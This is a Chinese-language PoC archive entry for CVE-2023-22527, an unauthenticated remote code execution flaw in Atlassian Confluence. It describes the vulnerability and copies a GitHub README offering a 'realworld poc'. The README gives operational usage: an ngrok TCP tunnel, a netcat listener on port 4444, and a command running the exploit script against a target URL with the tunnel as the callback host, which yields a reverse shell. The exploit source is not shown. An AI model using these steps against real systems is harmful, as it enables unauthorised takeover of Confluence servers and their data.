POC详情: 4fd9659479f59a70dbcd2b1d3cbd7e03dfd04075

来源
https://github.com/VNCERT-CC/CVE-2023-22527-confluence
关联漏洞
标题: Atlassian Confluence 安全漏洞 (CVE-2023-22527)
描述:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
描述
[Confluence] CVE-2023-22527 realworld poc
介绍
# CVE-2023-22527-confluence
[Confluence] CVE-2023-22527 realworld poc

# Usage
## Download bun
https://github.com/oven-sh/bun/releases

## Start ngrok
```
ngrok tcp 4444
```

## Listen localhost 4444
```
nc -nvlp 4444
```

## Run exploit
```
bun exploit-CVE-2023-22527.js --lhost 0.tcp.ap.ngrok.io --lport 12169 --target https://xxx/
```

## Result
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/716a9df2-3154-4672-9410-86ba87971798)
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/1a2d7711-24dc-4837-8e49-21687ea4f6be)
文件快照

 [4.0K]  /data/pocs/4fd9659479f59a70dbcd2b1d3cbd7e03dfd04075
├── [3.6K]  exploit-CVE-2023-22527.js
└── [ 583]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。